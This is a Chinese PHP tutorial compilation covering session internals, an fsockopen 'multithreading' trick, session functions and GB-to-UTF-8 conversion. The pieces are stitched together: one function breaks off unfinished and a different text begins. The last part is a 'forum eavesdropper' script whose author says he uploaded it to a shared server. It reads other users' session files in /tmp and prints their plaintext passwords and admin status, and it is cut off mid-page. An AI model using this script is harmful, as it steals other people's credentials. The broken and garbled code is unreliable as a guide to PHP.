简单易懂，Session的工作方式(转)

    下面我们来看一下Session是如何工作的。不知你是否知道通过Cookie来实现身份认证的吧。首先生成一个独一无二的Cookie作为用户身份的标志，并在数据库中进行注册。然后通过用户传递来的Cookie和数据库中注册的Cookie进行对照以确定用户的身份。
    Session的工作原理也是这样。
    首先，PHP为建立Session的用户产生一个独一无二的字符串，用来标志这个用户的session。一般将这个字符串称作Session Id。然后“sess”＋Session Id为文件名（例如一个Session ID为111，那么文件名为sess_111）在服务器的文件系统中建立一个文件，在文件中保存用户在Session所定义的全局变量的变量名和值。然后再将Session Id作为一个名为PHPSession的Cookie保存在用户端的文件系统中。
    然后，当用户再次连接服务器访问一个PHP脚本时，PHP从用户发来的PEESession这个Cookie中得到用户所在Session的Session Id，并根据Session Id从服务器的文件系统中保存Session信息的文件。最后从这个文件中读出用户在上次连接时所设置的全局变量的值。
    因此，我们可以看到Session的工作原理和我们上一节所介绍的身份认证的工作原理是一样的。所不同的只是Session将信息保存在了服务器的文件系统中，而我们将信息保存在了数据库中。当然使用Session好处就是数据的保存和获取是由PHP自动完成的，而直接使用Cookie的话就需要自己动手进行数据的保存和获取。
    Session利用Cookie的身份标志功能，将用户在浏览网站时需要保存的信息保存在服务器上。这样Session既克服了HTTP协议的缺陷，又防止了信息的泄漏，而且方便了编程者的使用，是一个非常好的解决方案。不过，Session的功能只有PHP4支持，PHP3是不支持Session的。因此使用PHP3进行网站构建的读者只能采用直接使用Cookie的方式。

PHP本身是不支持多线程的, 但apache是支持多线程的
我知道的有2种：
１，同页面iframe，这个比较不好，不能很好实现参数传递
２，例子
go.php
[CODE][<?php
function runThread()
{
$fp = fsockopen('localhost', 80, $errno, $errmsg);
fputs($fp, "GET /go.php?act=b ");
fclose($fp);
}
function a()
{
$fp = fopen('1.txt', 'w');
fputs($fp, 'Set in ' . Date('h:i:s', time()) . (double)microtime() . " ");
fclose($fp);
}
function b()
{
$fp = fopen('2.txt', 'w');
fputs($fp, 'Set in ' . Date('h:i:s', time()) . (double)microtime() . " ");
fclose($fp);
}
if(!isset($_GET['act'])) $_GET['act'] = 'a';
if($_GET['act'] == 'a')
{
runThread();
a();
}
else if($_GET['act'] == 'b') b();
?>/CODE]
速度够快的话你可以发现　1.txt 和 2.txt 有些时间一样的
           关于session的几个补充函数
在PHP下，关于session的讨论很多，其实在PHP4中还有几个函数是我们平时没有注意到的。
下面我把它们介绍给大家吧。
其中的session_set_save_handler()可真是个好东西。
//********************
session_unset (PHP4 >= 4.0b4)
void session_unset(void);
这个函数可以把当然注册的所有的session变量置为空。注意它不是unregister，也不同于destroy。
下面这个例子，对此函数做了很好的说明。
<?php
session_register("a","b","c"); //auto-session-start
$a=1;
$b=2;
$c=3;
session_unregister("a"); //unregistrered $a
echo "A: $a - reg:".session_is_registered("a")."
"; // but the global $a remains
session_unset(); // unsets $b und $c
echo "B:$b - reg:".session_is_registered("b")."
"; // the registration remains !
echo "C:$c - reg:".session_is_registered("c")."
";
echo session_encode();
?>
输出：
A: 1 - reg:
B: - reg:1
C: - reg:1
!b|!c|
//********************************
session_get_cookie_params (PHP4 >= 4.0RC2)
array session_get_cookie_params (void);
返回一个数组，记录了当前session的cookie的一些信息。
有：
"lifetime" - cookie的生存期。
"path" - cookie的保存路径。
"domain" - cookie的域。
//*******************************
session_set_cookie_params (PHP4 >= 4.0b4)
void session_set_cookie_params (int lifetime [, string path ][, string domain]])
设置session的cookie的一些参参数，类似于php.ini中的设置，但本函数所作的设置，只对当前脚本文件有效。
//*******************************
下面要介绍的这个函数应是对大家都很有用的，你是不是对自定义一个不用cookie来保存的session有兴趣呢？这个函数就可以实现你这样的设想。
让我想想，如果不用cookie的好处是什么？至少一点，你不用担心客户端的的cookie的功能是否打开了，对吧。
    很早以前找到一个把GB码转化为UTF-8的函数，配合一个GB到UNICODE的对照表（gb2312.txt），用于在GD中输出汉字。后来发现在欲输出的内容中含有西文字符时，会出现混乱。后来找到了修改后的代码，解决了问题。现将两个函数做一对比分析如下。
首先，这是一个UNICODE到UTF-8编码转换的函数，这一部分修改前后没有变化：
function u2utf8($c)
{
for($i=0;$i<count($c);$i++)
$str="";
if ($c < 0x80) {
$str.=$c;
}
else if ($c < 0x800) {
$str.=(0xC0 | $c>>6);
$str.=(0x80 | $c & 0x3F);
}
else if ($c < 0x10000) {
$str.=(0xE0 | $c>>12);
$str.=(0x80 | $c>>6 & 0x3F);
$str.=(0x80 | $c & 0x3F);
}
else if ($c < 0x200000) {
$str.=(0xF0 | $c>>18);
$str.=(0x80 | $c>>12 & 0x3F);
$str.=(0x80 | $c>>6 & 0x3F);
$str.=(0x80 | $c & 0x3F);
}
return $str;
}
这里完全是按照UTF-8编码的规则，通过判断字符属于不同的UNICODE编码段范围，进行不同的移位和位与操作，以转化为UTF-8编码。关于该规则可参考http://www.utf8.org/上的说明。
这是修改前的GB转化为UTF-8编码的函数，其中调用了上面的u2utf8函数。
function gb2utf8($gb)     /* Program writen by sadly www.phpx.com    */
{
if(!trim($gb))
return $gb;
$filename="gb2312.txt";
$tmp=file($filename);
$codetable=array();
while(list($key,$value)=each($tmp))
$codetable[hexdec(substr($value,0,6))]=substr($value,7,6);
$utf8="";
while($gb)
{
if (ord(substr($gb,0,1))>127)
{
$this=substr($gb,0,2);
$gb=substr($gb,2,strlen($gb));
$utf8.=u2utf8(hexdec($codetable[hexdec(bin2hex($this))-0x8080]));
}
else
{
$gb=substr($gb,1,strlen($gb));
$utf8.=u2utf8(substr($gb,0,1));
}
}
$ret="";
for($i=0;$i<strlen($utf8);$i+=3)
$ret.=chr(substr($utf8,$i,3));
return $ret;
之所以是能写出来这个函数，主要是对该网站的session结构清楚，如：name|s:4:"tasm";passwd|s:6:"111111";mode|s:1:"1"，也知道该session存放的位置，而且可以上传文件，所以嘛，当时就做了一次小小的黑客，在线的朋友的密码可以一览无余，呵呵：
<?
function submit1(){
global $username;
print "<title>论坛监听器</title>";
$i=0;
if($username=="tasm"||$username=="Tasm")
{
print "你也太黑了吧？连我你也查？";
    return;
}
$path="/tmp/";
$d = dir($path);
while($entry=$d->read()){
if(substr($entry,0,4)=="sess"){
$entry=$path.$entry;
$ary=@file($entry);
if(!empty($ary[0])){
$ary = explode(";",$ary[0]);
$name= explode(":",$ary[0]);
if($name[2]==""".$username."""){
$passwd= explode(":",$ary[1]);
$mode=explode(":",$ary[3]);
print "用户笔名:".$name[2]."<br>使用密码:".$passwd[2]."<br>使用模式:";
if($mode[1]==1)
print "<font color=red>管理员</font>";
else
print "一般用户";
print"<br><br>偷窃他人密码是不道德行为请少少为之<br>";
$i=1;
break;
}}}}
if(!$i)
print "用户:".$username."真的在线吗？如你确定，<a href='javascript:history.go(-1)'>请再来一次</a>，不要多打空格！";
$d->close();
}
function login(){
?>
<html>
<head>
<title>论坛监听器</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head>
<body bgcolor="#FFFFFF">
<div align="center">
<p>论坛监听器 </p>
<p> </p>